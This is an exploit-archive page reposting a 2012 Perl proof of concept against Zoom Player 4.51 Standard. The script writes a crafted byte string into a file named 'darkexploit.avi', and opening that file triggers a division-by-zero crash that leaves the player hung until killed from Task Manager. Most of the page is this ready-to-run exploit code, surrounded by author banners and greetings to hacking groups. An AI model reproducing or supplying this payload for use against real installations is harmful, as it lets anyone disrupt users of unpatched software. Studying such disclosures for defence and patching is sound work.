Zoom Player 4.51 Denial Of Service

2012.06.30
Credit: Dark-Puzzle
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/perl #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0 _ __ __ __ 1 #1 /' \ __ /'__`\ /\ \__ /'__`\ 0 #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 #1 \ \____/ >> Exploit database separated by exploit 0 #0 \/___/ type (local, remote, DoS, etc.) 1 #1 1 #0 [x] Official Website: http://www.1337day.com 0 #1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com # #1 ========================================== 1 #0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 #0 1 #1 dark-puzzle[at]live[at]fr 0 #0 ========================================== 1 #1 Pentesting/exploit coding/bug research 0 #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # [0day Exploits] Allah , Alwatan , Almalik .[0day Exploits] # Exploit Title: Zoom Player 4.51 Standard - Division By Zero Vulnerability . # Author: Dark-Puzzle . # Danger : Medium . # Category :Local Exploit . # Version: 4.51 Standard # Vendor : http://www.inmatrix.com/ # Software Link : http://www.oldapps.com/download.php?oldappsid=zp451std.exe # Date: 30 June 2012 . #------------------------------------------------------------------------# # # # Usage : perl zoom.pl # # # #------------------------------------------------------------------------# my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00 \x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb \x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50 \x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e \x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2 \x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2 \xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29 \xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53 \x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad \x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61 \x9e\x75\x4c\x71\xa2\x9d\xfd\x65\xcc\x59\x23\xe0\xeb\xae\x58\xa3 \xe9\xff\x16\xfc\x08\x03\x36\x4a\x69\xbb\xc4\x19\x10\x1b\xc8\x2c \x9e\xd9\x56\xfe\x38\x32\xf7\xe5\x2c\xd8\xb4\x6c\x31\xcc\x15\x5c \x41\xda\x03\xde\x5c\x23\x2d\xda\x4f\x7b\x44\x07\x60\x24\xa7\x58 \x65\xf7\xe9\xaa\xff\x02\x9d\x1f\x39\x76\x7e\x75\x43\xac\xe5\xc9 \xd0\x43\x2e\x4c\xeb\x81\x26\xb5\xcf\x6d\xb9\xe9\xa0\xc7\x85\x4a \xce\x5f\xb4\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff \xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff \xcb\x6e\x2a\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # A division by zero exploit causing a DoS to the program ( neither you can't play nothing nor close the program ) . # to close the Zoom player you have to use the Windows Task Manager . my $file = "darkexploit.avi"; open ($File, ">$file"); print $File $h; close ($File); #------------------------------------------------------------------------------------------------------------------------ #Dark-Puzzle (Souhail) . #\x90 #Follow me : fb.me/dark.puzzle #\x90 #Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army #\x90 #Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers.... #\x90 #Pentesting is my LIFE . #\x90 #GREY HAT Mercy From M0rocC0 .

References:

http://www.1337day.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top